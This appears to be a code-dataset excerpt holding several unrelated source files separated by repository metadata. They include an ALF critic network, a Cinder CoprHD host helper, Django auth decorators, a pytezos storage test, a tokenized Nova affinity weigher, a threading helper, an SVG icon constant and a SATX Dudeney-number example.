_check_individual(spec, proc): if spec.is_discrete: assert proc is not None, ( 'CriticNetwork only supports continuous actions. One of given ' + 'action specs {} is discrete. Use QNetwork instead. '.format( spec) + 'Alternatively, specify `action_input_processors` to transform ' + 'discrete actions to continuous action embeddings first.') if action_input_processors is None: action_input_processors = nest.map_structure(lambda _: None, action_spec) nest.map_structure(_check_individual, action_spec, action_input_processors) @alf.configurable class CriticNetwork(EncodingNetwork): """Creates an instance of ``CriticNetwork`` for estimating action-value of continuous or discrete actions. The action-value is defined as the expected return starting from the given input observation and taking the given action. This module takes observation as input and action as input and outputs an action-value tensor with the shape of ``[batch_size]``. The network take a tuple of (observation, action) as input to computes the action-value given an observation. """ def __init__(self, input_tensor_spec, output_tensor_spec=TensorSpec(()), observation_input_processors=None, observation_preprocessing_combiner=None, observation_conv_layer_params=None, observation_fc_layer_params=None, action_input_processors=None, action_preprocessing_combiner=None, action_fc_layer_params=None, observation_action_combiner=None, joint_fc_layer_params=None, activation=torch.relu_, kernel_initializer=None, use_fc_bn=False, use_naive_parallel_network=False, name="CriticNetwork"): """ Args: input_tensor_spec: A tuple of ``TensorSpec``s ``(observation_spec, action_spec)`` representing the inputs. output_tensor_spec (TensorSpec): spec for the output observation_input_preprocessors (nested Network|nn.Module|None): a nest of input preprocessors, each of which will be applied to the corresponding observation input. observation_preprocessing_combiner (NestCombiner): preprocessing called on complex observation inputs. observation_conv_layer_params (tuple[tuple]): a tuple of tuples where each tuple takes a format ``(filters, kernel_size, strides, padding)``, where ``padding`` is optional. observation_fc_layer_params (tuple[int]): a tuple of integers representing hidden FC layer sizes for observations. action_input_processors (nested Network|nn.Module|None): a nest of input preprocessors, each of which will be applied to the corresponding action input. action_preprocessing_combiner (NestCombiner): preprocessing called to combine complex action inputs. action_fc_layer_params (tuple[int]): a tuple of integers representing hidden FC layer sizes for actions. observation_action_combiner (NestCombiner): combiner class for fusing the observation and action. If None, ``NestConcat`` will be used. joint_fc_layer_params (tuple[int]): a tuple of integers representing hidden FC layer sizes FC layers after merging observations and actions. activation (nn.functional): activation used for hidden layers. The last layer will not be activated. kernel_initializer (Callable): initializer for all the layers but the last layer. If none is provided a variance_scaling_initializer with uniform distribution will be used. use_fc_bn (bool): whether use Batch Normalization for the internal FC layers (i.e. FC layers beside the last one). use_naive_parallel_network (bool): if True, will use ``NaiveParallelNetwork`` when ``make_parallel`` is called. This might be useful in cases when the ``NaiveParallelNetwork`` has an advantange in terms of speed over ``ParallelNetwork``. You have to test to see which way is faster for your particular situation. name (str): """ if kernel_initializer is None: kernel_initializer = functools.partial( variance_scaling_init, gain=math.sqrt(1.0 / 3), mode='fan_in', distribution='uniform') observation_spec, action_spec = input_tensor_spec obs_encoder = EncodingNetwork( observation_spec, input_preprocessors=observation_input_processors, preprocessing_combiner=observation_preprocessing_combiner, conv_layer_params=observation_conv_layer_params, fc_layer_params=observation_fc_layer_params, activation=activation, kernel_initializer=kernel_initializer, use_fc_bn=use_fc_bn, name=name + ".obs_encoder") _check_action_specs_for_critic_networks(action_spec, action_input_processors, action_preprocessing_combiner) action_encoder = EncodingNetwork( action_spec, input_preprocessors=action_input_processors, preprocessing_combiner=action_preprocessing_combiner, fc_layer_params=action_fc_layer_params, activation=activation, kernel_initializer=kernel_initializer, use_fc_bn=use_fc_bn, name=name + ".action_encoder") last_kernel_initializer = functools.partial( torch.nn.init.uniform_, a=-0.003, b=0.003) if observation_action_combiner is None: observation_action_combiner = alf.layers.NestConcat(dim=-1) super().__init__( input_tensor_spec=input_tensor_spec, output_tensor_spec=output_tensor_spec, input_preprocessors=(obs_encoder, action_encoder), preprocessing_combiner=observation_action_combiner, fc_layer_params=joint_fc_layer_params, activation=activation, kernel_initializer=kernel_initializer, last_layer_size=output_tensor_spec.numel, last_activation=math_ops.identity, use_fc_bn=use_fc_bn, last_kernel_initializer=last_kernel_initializer, name=name) self._use_naive_parallel_network = use_naive_parallel_network def make_parallel(self, n): """Create a parallel critic network using ``n`` replicas of ``self``. The initialized network parameters will be different. If ``use_naive_parallel_network`` is True, use ``NaiveParallelNetwork`` to create the parallel network. """ if self._use_naive_parallel_network: return alf.networks.NaiveParallelNetwork(self, n) else: return super().make_parallel(n, True) @alf.configurable class CriticRNNNetwork(LSTMEncodingNetwork): """Creates an instance of ``CriticRNNNetwork`` for estimating action-value of continuous or discrete actions. The action-value is defined as the expected return starting from the given inputs (observation and state) and taking the given action. It takes observation and state as input and outputs an action-value tensor with the shape of [batch_size]. """ def __init__(self, input_tensor_spec, output_tensor_spec=TensorSpec(()), observation_input_processors=None, observation_preprocessing_combiner=None, observation_conv_layer_params=None, observation_fc_layer_params=None, action_input_processors=None, action_preprocessing_combiner=None, action_fc_layer_params=None, joint_fc_layer_params=None, lstm_hidden_size=100, critic_fc_layer_params=None, activation=torch.relu_, kernel_initializer=None, name="CriticRNNNetwork"): """ Args: input_tensor_spec: A tuple of ``TensorSpec``s ``(observation_spec, action_spec)`` representing the inputs. ourput_tensor_spec (TensorSpec): spec for the output observation_input_preprocessors (nested Network|nn.Module|None): a nest of input preprocessors, each of which will be applied to the corresponding observation input. observation_preprocessing_combiner (NestCombiner): preprocessing called on complex observation inputs. observation_conv_layer_params (tuple[tuple]): a tuple of tuples where each tuple takes a format ``(filters, kernel_size, strides, padding)``, where ``padding`` is optional. observation_fc_layer_params (tuple[int]): a tuple of integers representing hidden FC layer sizes for observations. action_input_processors (nested Network|nn.Module|None): a nest of input preprocessors, each of which will be applied to the corresponding action input.a action_preprocessing_combiner (NestCombiner): preprocessing called to combine complex action inputs. action_fc_layer_params (tuple[int]): a tuple of integers representing hidden FC layer sizes for actions. joint_fc_layer_params (tuple[int]): a tuple of integers representing hidden FC layer sizes FC layers after merging observations and actions. lstm_hidden_size (int or tuple[int]): the hidden size(s) of the LSTM cell(s). Each size corresponds to a cell. If there are multiple sizes, then lstm cells are stacked. critic_fc_layer_params (tuple[int]): a tuple of integers representing hidden FC layers that are applied after the lstm cell's output. activation (nn.functional): activation used for hidden layers. The last layer will not be activated. kernel_initializer (Callable): initializer for all the layers but the last layer. If none is provided a ``variance_scaling_initializer`` with uniform distribution will be used. name (str): """ if kernel_initializer is None: kernel_initializer = functools.partial( variance_scaling_init, gain=math.sqrt(1.0 / 3), mode='fan_in', distribution='uniform') observation_spec, action_spec = input_tensor_spec obs_encoder = EncodingNetwork( observation_spec, input_preprocessors=observation_input_processors, preprocessing_combiner=observation_preprocessing_combiner, conv_layer_params=observation_conv_layer_params, fc_layer_params=observation_fc_layer_params, activation=activation, kernel_initializer=kernel_initializer) _check_action_specs_for_critic_networks(action_spec, action_input_processors, action_preprocessing_combiner) action_encoder = EncodingNetwork( action_spec, input_preprocessors=action_input_processors, preprocessing_combiner=action_preprocessing_combiner, fc_layer_params=action_fc_layer_params, activation=activation, kernel_initializer=kernel_initializer) last_kernel_initializer = functools.partial( torch.nn.init.uniform_, a=-0.003, b=0.003) super().__init__( input_tensor_spec=input_tensor_spec, output_tensor_spec=output_tensor_spec, input_preprocessors=(obs_encoder, action_encoder), preprocessing_combiner=alf.layers.NestConcat(dim=-1), pre_fc_layer_params=joint_fc_layer_params, hidden_size=lstm_hidden_size, post_fc_layer_params=critic_fc_layer_params, activation=activation, kernel_initializer=kernel_initializer, last_layer_size=output_tensor_spec.numel, last_activation=math_ops.identity, last_kernel_initializer=last_kernel_initializer) def make_parallel(self, n): """Create a parallel critic RNN network using ``n`` replicas of ``self``. The initialized network parameters will be different. If ``use_naive_parallel_network`` is True, use ``NaiveParallelNetwork`` to create the parallel network. """ return super().make_parallel(n, True)
47.665584
93
0.649683
e728b3a6504e94174778e77912866b7cd8da6690
3,759
py
Python
cinder/volume/drivers/coprhd/helpers/host.py
bswartz/cinder
6cfecade9e2ee86bbb7d95c3c401c9e4c70f6a96
[ "Apache-2.0" ]
null
null
null
cinder/volume/drivers/coprhd/helpers/host.py
bswartz/cinder
6cfecade9e2ee86bbb7d95c3c401c9e4c70f6a96
[ "Apache-2.0" ]
null
null
null
cinder/volume/drivers/coprhd/helpers/host.py
bswartz/cinder
6cfecade9e2ee86bbb7d95c3c401c9e4c70f6a96
[ "Apache-2.0" ]
null
null
null
# Copyright (c) 2016 EMC Corporation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from cinder.i18n import _ from cinder.volume.drivers.coprhd.helpers import commoncoprhdapi as common from cinder.volume.drivers.coprhd.helpers import tenant class Host(common.CoprHDResource): # All URIs for the Host operations URI_HOST_DETAILS = "/compute/hosts/{0}" URI_HOST_LIST_INITIATORS = "/compute/hosts/{0}/initiators" URI_COMPUTE_HOST = "/compute/hosts" URI_HOSTS_SEARCH_BY_NAME = "/compute/hosts/search?name={0}" def query_by_name(self, host_name, tenant_name=None): """Search host matching host_name and tenant if tenant_name provided. tenant_name is optional """ hostList = self.list_all(tenant_name) for host in hostList: hostUri = host['id'] hostDetails = self.show_by_uri(hostUri) if hostDetails: if hostDetails['name'] == host_name: return hostUri raise common.CoprHdError(common.CoprHdError.NOT_FOUND_ERR, (_( "Host with name: %s not found") % host_name)) def list_initiators(self, host_name): """Lists all initiators for the given host. :param host_name: The name of the host """ if not common.is_uri(host_name): hostUri = self.query_by_name(host_name, None) else: hostUri = host_name (s, h) = common.service_json_request( self.ipaddr, self.port, "GET", Host.URI_HOST_LIST_INITIATORS.format(hostUri), None) o = common.json_decode(s) if not o or "initiator" not in o: return [] return common.get_node_value(o, 'initiator') def list_all(self, tenant_name): """Gets the ids and self links for all compute elements.""" restapi = self.URI_COMPUTE_HOST tenant_obj = tenant.Tenant(self.ipaddr, self.port) if tenant_name is None: tenant_uri = tenant_obj.tenant_getid() else: tenant_uri = tenant_obj.tenant_query(tenant_name) restapi = restapi + "?tenant=" + tenant_uri (s, h) = common.service_json_request( self.ipaddr, self.port, "GET", restapi, None) o = common.json_decode(s) return o['host'] def show_by_uri(self, uri): """Makes REST API call to retrieve Host details based on its UUID.""" (s, h) = common.service_json_request(self.ipaddr, self.port, "GET", Host.URI_HOST_DETAILS.format(uri), None) o = common.json_decode(s) inactive = common.get_node_value(o, 'inactive') if inactive: return None return o def search_by_name(self, host_name): """Search host by its name.""" (s, h) = common.service_json_request( self.ipaddr, self.port, "GET", self.URI_HOSTS_SEARCH_BY_NAME.format(host_name), None) o = common.json_decode(s) if not o: return [] return common.get_node_value(o, "resource")
35.8
79
0.614525
37b907907f050194f31587b8b969113a63c9a5a1
3,049
py
Python
python3.4Smartforest/lib/python3.4/site-packages/django/contrib/auth/decorators.py
letouriste001/SmartForest_2.0
109b78bf1e8c8404800f377ab969395ccbb617be
[ "MIT" ]
null
null
null
python3.4Smartforest/lib/python3.4/site-packages/django/contrib/auth/decorators.py
letouriste001/SmartForest_2.0
109b78bf1e8c8404800f377ab969395ccbb617be
[ "MIT" ]
null
null
null
python3.4Smartforest/lib/python3.4/site-packages/django/contrib/auth/decorators.py
letouriste001/SmartForest_2.0
109b78bf1e8c8404800f377ab969395ccbb617be
[ "MIT" ]
null
null
null
from functools import wraps from django.conf import settings from django.contrib.auth import REDIRECT_FIELD_NAME from django.core.exceptions import PermissionDenied from django.shortcuts import resolve_url from django.utils import six from django.utils.decorators import available_attrs from django.utils.six.moves.urllib.parse import urlparse def user_passes_test(test_func, login_url=None, redirect_field_name=REDIRECT_FIELD_NAME): """ Decorator for views that checks that the user passes the given test, redirecting to the log-in page if necessary. The test should be a callable that takes the user object and returns True if the user passes. """ def decorator(view_func): @wraps(view_func, assigned=available_attrs(view_func)) def _wrapped_view(request, *args, **kwargs): if test_func(request.user): return view_func(request, *args, **kwargs) path = request.build_absolute_uri() resolved_login_url = resolve_url(login_url or settings.LOGIN_URL) # If the login url is the same scheme and net location then just # use the path as the "next" url. login_scheme, login_netloc = urlparse(resolved_login_url)[:2] current_scheme, current_netloc = urlparse(path)[:2] if ((not login_scheme or login_scheme == current_scheme) and (not login_netloc or login_netloc == current_netloc)): path = request.get_full_path() from django.contrib.auth.views import redirect_to_login return redirect_to_login( path, resolved_login_url, redirect_field_name) return _wrapped_view return decorator def login_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None): """ Decorator for views that checks that the user is logged in, redirecting to the log-in page if necessary. """ actual_decorator = user_passes_test( lambda u: u.is_authenticated(), login_url=login_url, redirect_field_name=redirect_field_name ) if function: return actual_decorator(function) return actual_decorator def permission_required(perm, login_url=None, raise_exception=False): """ Decorator for views that checks whether a user has a particular permission enabled, redirecting to the log-in page if necessary. If the raise_exception parameter is given the PermissionDenied exception is raised. """ def check_perms(user): if isinstance(perm, six.string_types): perms = (perm, ) else: perms = perm # First check if the user has the permission (even anon users) if user.has_perms(perms): return True # In case the 403 handler should be called raise the exception if raise_exception: raise PermissionDenied # As the last resort, show the login form return False return user_passes_test(check_perms, login_url=login_url)
3,049
3,049
0.69367
526d893526ca89ba0d96a81e9d02698c714cfff2
1,170
py
Python
tests/storage/cases/test_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.py
juztin/pytezos-1
7e608ff599d934bdcf129e47db43dbdb8fef9027
[ "MIT" ]
1
2020-08-11T02:31:24.000Z
2020-08-11T02:31:24.000Z
tests/storage/cases/test_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.py
juztin/pytezos-1
7e608ff599d934bdcf129e47db43dbdb8fef9027
[ "MIT" ]
1
2020-12-30T16:44:56.000Z
2020-12-30T16:44:56.000Z
tests/storage/cases/test_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.py
tqtezos/pytezos
a4ac0b022d35d4c9f3062609d8ce09d584b5faa8
[ "MIT" ]
1
2022-03-20T19:01:00.000Z
2022-03-20T19:01:00.000Z
from unittest import TestCase from tests import get_data from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson class StorageTestKT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(TestCase): @classmethod def setUpClass(cls): cls.maxDiff = None cls.contract = get_data('storage/mainnet/KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.json') def test_storage_encoding_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(self): type_expr = self.contract['script']['code'][1] val_expr = self.contract['script']['storage'] schema = build_schema(type_expr) decoded = decode_micheline(val_expr, type_expr, schema) actual = encode_micheline(decoded, schema) self.assertEqual(val_expr, actual) def test_storage_schema_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(self): _ = build_schema(self.contract['script']['code'][0]) def test_storage_format_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(self): _ = micheline_to_michelson(self.contract['script']['code']) _ = micheline_to_michelson(self.contract['script']['storage'])
41.785714
112
0.757265
de4a6e8103e176d0d6d39a6a3f3056286fa6720f
6,287
py
Python
nova/scheduler/weights/affinity.py
bopopescu/nova-token
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
[ "Apache-2.0" ]
null
null
null
nova/scheduler/weights/affinity.py
bopopescu/nova-token
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
[ "Apache-2.0" ]
null
null
null
nova/scheduler/weights/affinity.py
bopopescu/nova-token
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
[ "Apache-2.0" ]
2
2017-07-20T17:31:34.000Z
2020-07-24T02:42:19.000Z
begin_unit comment|'# Copyright (c) 2015 Ericsson AB' nl|'\n' comment|'# All Rights Reserved.' nl|'\n' comment|'#' nl|'\n' comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may' nl|'\n' comment|'# not use this file except in compliance with the License. You may obtain' nl|'\n' comment|'# a copy of the License at' nl|'\n' comment|'#' nl|'\n' comment|'# http://www.apache.org/licenses/LICENSE-2.0' nl|'\n' comment|'#' nl|'\n' comment|'# Unless required by applicable law or agreed to in writing, software' nl|'\n' comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT' nl|'\n' comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the' nl|'\n' comment|'# License for the specific language governing permissions and limitations' nl|'\n' comment|'# under the License.' nl|'\n' string|'"""\nAffinity Weighers. Weigh hosts by the number of instances from a given host.\n\nAffinityWeigher implements the soft-affinity policy for server groups by\npreferring the hosts that has more instances from the given group.\n\nAntiAffinityWeigher implements the soft-anti-affinity policy for server groups\nby preferring the hosts that has less instances from the given group.\n\n"""' newline|'\n' name|'from' name|'oslo_config' name|'import' name|'cfg' newline|'\n' name|'from' name|'oslo_log' name|'import' name|'log' name|'as' name|'logging' newline|'\n' nl|'\n' name|'from' name|'nova' op|'.' name|'i18n' name|'import' name|'_LW' newline|'\n' name|'from' name|'nova' op|'.' name|'scheduler' name|'import' name|'weights' newline|'\n' nl|'\n' DECL|variable|CONF name|'CONF' op|'=' name|'cfg' op|'.' name|'CONF' newline|'\n' nl|'\n' DECL|variable|LOG name|'LOG' op|'=' name|'logging' op|'.' name|'getLogger' op|'(' name|'__name__' op|')' newline|'\n' nl|'\n' nl|'\n' DECL|class|_SoftAffinityWeigherBase name|'class' name|'_SoftAffinityWeigherBase' op|'(' name|'weights' op|'.' name|'BaseHostWeigher' op|')' op|':' newline|'\n' DECL|variable|policy_name indent|' ' name|'policy_name' op|'=' name|'None' newline|'\n' nl|'\n' DECL|member|_weigh_object name|'def' name|'_weigh_object' op|'(' name|'self' op|',' name|'host_state' op|',' name|'request_spec' op|')' op|':' newline|'\n' indent|' ' string|'"""Higher weights win."""' newline|'\n' name|'if' name|'not' name|'request_spec' op|'.' name|'instance_group' op|':' newline|'\n' indent|' ' name|'return' number|'0' newline|'\n' nl|'\n' dedent|'' name|'policies' op|'=' name|'request_spec' op|'.' name|'instance_group' op|'.' name|'policies' newline|'\n' nl|'\n' name|'if' name|'self' op|'.' name|'policy_name' name|'not' name|'in' name|'policies' op|':' newline|'\n' indent|' ' name|'return' number|'0' newline|'\n' nl|'\n' dedent|'' name|'instances' op|'=' name|'set' op|'(' name|'host_state' op|'.' name|'instances' op|'.' name|'keys' op|'(' op|')' op|')' newline|'\n' name|'members' op|'=' name|'set' op|'(' name|'request_spec' op|'.' name|'instance_group' op|'.' name|'members' op|')' newline|'\n' name|'member_on_host' op|'=' name|'instances' op|'.' name|'intersection' op|'(' name|'members' op|')' newline|'\n' nl|'\n' name|'return' name|'len' op|'(' name|'member_on_host' op|')' newline|'\n' nl|'\n' nl|'\n' DECL|class|ServerGroupSoftAffinityWeigher dedent|'' dedent|'' name|'class' name|'ServerGroupSoftAffinityWeigher' op|'(' name|'_SoftAffinityWeigherBase' op|')' op|':' newline|'\n' DECL|variable|policy_name indent|' ' name|'policy_name' op|'=' string|"'soft-affinity'" newline|'\n' DECL|variable|warning_sent name|'warning_sent' op|'=' name|'False' newline|'\n' nl|'\n' DECL|member|weight_multiplier name|'def' name|'weight_multiplier' op|'(' name|'self' op|')' op|':' newline|'\n' indent|' ' name|'if' op|'(' name|'CONF' op|'.' name|'soft_affinity_weight_multiplier' op|'<' number|'0' name|'and' nl|'\n' name|'not' name|'self' op|'.' name|'warning_sent' op|')' op|':' newline|'\n' indent|' ' name|'LOG' op|'.' name|'warn' op|'(' name|'_LW' op|'(' string|"'For the soft_affinity_weight_multiplier only a '" nl|'\n' string|"'positive value is meaningful as a negative value '" nl|'\n' string|"'would mean that the affinity weigher would '" nl|'\n' string|"'prefer non-collocating placement.'" op|')' op|')' newline|'\n' name|'self' op|'.' name|'warning_sent' op|'=' name|'True' newline|'\n' nl|'\n' dedent|'' name|'return' name|'CONF' op|'.' name|'soft_affinity_weight_multiplier' newline|'\n' nl|'\n' nl|'\n' DECL|class|ServerGroupSoftAntiAffinityWeigher dedent|'' dedent|'' name|'class' name|'ServerGroupSoftAntiAffinityWeigher' op|'(' name|'_SoftAffinityWeigherBase' op|')' op|':' newline|'\n' DECL|variable|policy_name indent|' ' name|'policy_name' op|'=' string|"'soft-anti-affinity'" newline|'\n' DECL|variable|warning_sent name|'warning_sent' op|'=' name|'False' newline|'\n' nl|'\n' DECL|member|weight_multiplier name|'def' name|'weight_multiplier' op|'(' name|'self' op|')' op|':' newline|'\n' indent|' ' name|'if' op|'(' name|'CONF' op|'.' name|'soft_anti_affinity_weight_multiplier' op|'<' number|'0' name|'and' nl|'\n' name|'not' name|'self' op|'.' name|'warning_sent' op|')' op|':' newline|'\n' indent|' ' name|'LOG' op|'.' name|'warn' op|'(' name|'_LW' op|'(' string|"'For the soft_anti_affinity_weight_multiplier only a '" nl|'\n' string|"'positive value is meaningful as a negative value '" nl|'\n' string|"'would mean that the anti-affinity weigher would '" nl|'\n' string|"'prefer collocating placement.'" op|')' op|')' newline|'\n' name|'self' op|'.' name|'warning_sent' op|'=' name|'True' newline|'\n' nl|'\n' dedent|'' name|'return' name|'CONF' op|'.' name|'soft_anti_affinity_weight_multiplier' newline|'\n' nl|'\n' DECL|member|_weigh_object dedent|'' name|'def' name|'_weigh_object' op|'(' name|'self' op|',' name|'host_state' op|',' name|'request_spec' op|')' op|':' newline|'\n' indent|' ' name|'weight' op|'=' name|'super' op|'(' name|'ServerGroupSoftAntiAffinityWeigher' op|',' name|'self' op|')' op|'.' name|'_weigh_object' op|'(' nl|'\n' name|'host_state' op|',' name|'request_spec' op|')' newline|'\n' name|'return' op|'-' number|'1' op|'*' name|'weight' newline|'\n' dedent|'' dedent|'' endmarker|'' end_unit
16.161954
395
0.663273
7d853d0fb193fed74ab9e861c4ac08ed533ac101
4,303
py
Python
ondevice/core/thread.py
ondevice/ondevice-client
a291f22827684f192a4f03e6fce3325527f30268
[ "Linux-OpenIB" ]
2
2016-08-02T15:32:19.000Z
2016-08-25T08:51:50.000Z
ondevice/core/thread.py
ondevice/ondevice-python
a291f22827684f192a4f03e6fce3325527f30268
[ "Linux-OpenIB" ]
29
2016-07-08T06:56:06.000Z
2016-11-09T22:59:44.000Z
ondevice/core/thread.py
ondevice/ondevice-client
a291f22827684f192a4f03e6fce3325527f30268
[ "Linux-OpenIB" ]
null
null
null
from ondevice.core import state import logging import threading import time class ThreadInfo: """ Stores some information on each BackgroundThread instance """ def __init__(self, **kwargs): for key in 'id,name'.split(','): if key not in kwargs: raise KeyError("Missing required ThreadInfo attribute: '{0}' (got: {1})", key, kwargs.keys()) for k,v in kwargs.items(): setattr(self, k, v) class BackgroundThread(): """ Thin wrapper around threading.Thread with simple event support. During the lifecycle of a backgrond thread the following events may occur (roughly in that order): - started: after a call to start() - running: before target() is being executed - stopping: after a call to stop() - finished: after target() has finished """ def __init__(self, target, stopFn, name, args=(), kwargs={}): """ Create a BackgroundThread object - target: Thread function - stopFn: Function to gracefully stop the thread function (`target`) - will be called when invoking .stop() - name: Thread name (doesn't have to be unique) - args: arguments to pass to target() - kwargs: keyword arguments to pass to target() """ threadId = state.add('threads', 'seq', 1) self.info = ThreadInfo(name=name, id=threadId) self.target = target self.stopFn = stopFn self._listeners = {} self._thread = threading.Thread(target=self.run, name=name, args=args, kwargs=kwargs) def _emit(self, event, *args, **kwargs): listeners = list(self._listeners[event]) if event in self._listeners else [] logging.debug("thread {0} fired event: {1} (args={2}, kwargs={3}, {4} listeners)".format(self.target, event, args, kwargs, len(listeners))) for l in listeners: l(*args, **kwargs) def run(self): """ Runs the target function (don't call this directly unless you want the target function be run in the current thread) """ # state.add('threads', 'count', 1) self.info.startedAt = time.time() state.set('threads.info', self.info.id, self.info.__dict__) self._emit('running') try: self.target() finally: self._emit('finished') state.remove('threads.info', self.info.id) state.add('threads', 'count', -1) def addListener(self, event, fn): if event not in ['started', 'running', 'stopping', 'finished']: raise KeyError("Unsupported event: '{0}'".format(event)) if not event in self._listeners: self._listeners[event] = set() self._listeners[event].add(fn) def addListenerObject(self, obj): """ Helper function to bind all signals to predefined methods of `obj` (if they exist) - mainly used for testing """ fns = {'threadStarted': 'started', 'threadRunning':'running', 'threadStopping':'stopping', 'threadFinished':'finished'} for fn,event in fns.items(): if hasattr(obj, fn): self.addListener(event, getattr(obj, fn)) def removeListener(self, event, fn): if event not in self._listeners: return # Cant' remove something that isn't there self._listeners[event].remove(fn) def start(self): self._thread.start() self._emit('started') def stop(self): """ call the stopFn passed to the constructor and emit the 'stopping' signal """ self.stopFn() self._emit('stopping') class FixedDelayTask(BackgroundThread): """ Represents a repeating task that runs with a fixed delay (delay) in a background thread """ def __init__(self, target, interval, name, *args, **kwargs): self._target = target self.interval = interval self.args = args self.kwargs = kwargs self._event = threading.Event() BackgroundThread.__init__(self, self._run, self._stop, name) def _run(self): while not self._event.wait(self.interval): try: self._target(*self.args, **self.kwargs) except: logging.exception('Exception in FixedDelayTask') def _stop(self): self._event.set()
36.777778
147
0.614223
c196cce761871f87a40c47cbc54baf6c2cdf3c5c
1,108
py
Python
examples/Dudeney.py
maxtuno/SATX
68fc74a2b64c5c59a695724497d3327c47e6d152
[ "MIT" ]
4
2021-04-09T04:18:17.000Z
2021-08-04T13:34:54.000Z
examples/Dudeney.py
maxtuno/SATX
68fc74a2b64c5c59a695724497d3327c47e6d152
[ "MIT" ]
null
null
null
examples/Dudeney.py
maxtuno/SATX
68fc74a2b64c5c59a695724497d3327c47e6d152
[ "MIT" ]
null
null
null
""" See https://en.wikipedia.org/wiki/Dudeney_number In number theory, a Dudeney number in a given number base b is a natural number equal to the perfect cube of another natural number such that the digit sum of the first natural number is equal to the second. The name derives from Henry Dudeney, who noted the existence of these numbers in one of his puzzles. There are 5 non trivial numbers for base 10, and the highest such number is formed of 5 digits. Below, the model is given for base 10. """ from math import ceil import satx # for base 10 n_digits = 5 satx.engine((10 ** n_digits).bit_length(), cnf_path='aux.cnf') # n is a (non-trivial) Dudeney number n = satx.integer() # s is the perfect cubic root of n s = satx.integer() # d[i] is the ith digit of the Dudeney number d = satx.vector(size=n_digits) satx.apply_single(d, lambda t: t < 10) assert 2 <= n < 10 ** n_digits assert s < ceil((10 ** n_digits) ** (1 / 3)) + 1 assert n == s * s * s assert sum(d) == s assert satx.dot(d, [10 ** (n_digits - i - 1) for i in range(n_digits)]) == n while satx.satisfy('slime'): print(n, s, d)
28.410256
100
0.702166
d4c715129502ceb90a0b93512f4465122a346b53
1,469
py
Python
service/dao/model/job_seeker_answers.py
CyberArkForTheCommunity/jobli-backend
2309c9ac33993cb89a8e1581630d99b46f8d55aa
[ "MIT" ]
null
null
null
service/dao/model/job_seeker_answers.py
CyberArkForTheCommunity/jobli-backend
2309c9ac33993cb89a8e1581630d99b46f8d55aa
[ "MIT" ]
1
2021-12-23T13:36:43.000Z
2021-12-23T13:36:43.000Z
service/dao/model/job_seeker_answers.py
CyberArkForTheCommunity/jobli-backend
2309c9ac33993cb89a8e1581630d99b46f8d55aa
[ "MIT" ]
null
null
null
from typing import Dict, Optional from pydantic import BaseModel from service.dao.single_table_service import DATA_DELIMITER, SingleTableRecord JOB_SEEKER_ANSWERS_PK = "JOB_SEEKER_ANSWER" JOB_SEEKER_ANSWERS_SK_PREFIX = "JOB_SEEKER_ID" class JobSeekerAnswers(BaseModel, SingleTableRecord): # def __init__(self, **kwargs): # if 'version' not in kwargs: # self.version = 0 # for attribute, value in kwargs.items(): # if hasattr(self, attribute): # setattr(self, attribute, value) job_seeker_id: str job_seeker_name: str a1: Optional[bool] a2: Optional[bool] a3: Optional[bool] a4: Optional[bool] a5: Optional[bool] a6: Optional[bool] a7: Optional[bool] a8: Optional[bool] a9: Optional[bool] a10: Optional[bool] creationTime: Optional[str] lastUpdateTime: Optional[str] version: int = 0 @staticmethod def build_pk(): return JOB_SEEKER_ANSWERS_PK @staticmethod def build_sk(job_seeker_id: str): return JOB_SEEKER_ANSWERS_SK_PREFIX + DATA_DELIMITER + job_seeker_id def produce_pk(self) -> str: return self.build_pk() def produce_sk(self) -> str: return self.build_sk(self.job_seeker_id) def produce_gsi1_pk(self) -> Optional[str]: return None def produce_gsi1_sk(self) -> Optional[str]: return None def as_dict(self) -> Dict: return self.__dict__
24.483333
78
0.667801
fbccf37b2928c34f99bf023df676379b0df0319c
318
py
Python
octicons16px/chevron_up.py
andrewp-as-is/octicons16px.py
1272dc9f290619d83bd881e87dbd723b0c48844c
[ "Unlicense" ]
1
2021-01-28T06:47:39.000Z
2021-01-28T06:47:39.000Z
octicons16px/chevron_up.py
andrewp-as-is/octicons16px.py
1272dc9f290619d83bd881e87dbd723b0c48844c
[ "Unlicense" ]
null
null
null
octicons16px/chevron_up.py
andrewp-as-is/octicons16px.py
1272dc9f290619d83bd881e87dbd723b0c48844c
[ "Unlicense" ]
null
null
null
OCTICON_CHEVRON_UP = """ <svg class="octicon octicon-chevron-up" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M3.22 9.78a.75.75 0 010-1.06l4.25-4.25a.75.75 0 011.06 0l4.25 4.25a.75.75 0 01-1.06 1.06L8 6.06 4.28 9.78a.75.75 0 01-1.06 0z"></path></svg> """
63.6
287
0.663522
98a0eaed0f150065563a1722aa39ccfa19f514ed
1,495
py
Python
{{cookiecutter.project_slug}}/usuario/api_views.py
claysllanxavier/django-cookiecutter
97de7ff4ed3dc94c32bf756a57aee0664a888cbc
[ "BSD-3-Clause" ]
8
2021-08-13T17:48:27.000Z
2022-02-22T02:34:15.000Z
{{cookiecutter.project_slug}}/usuario/api_views.py
claysllanxavier/django-cookiecutter
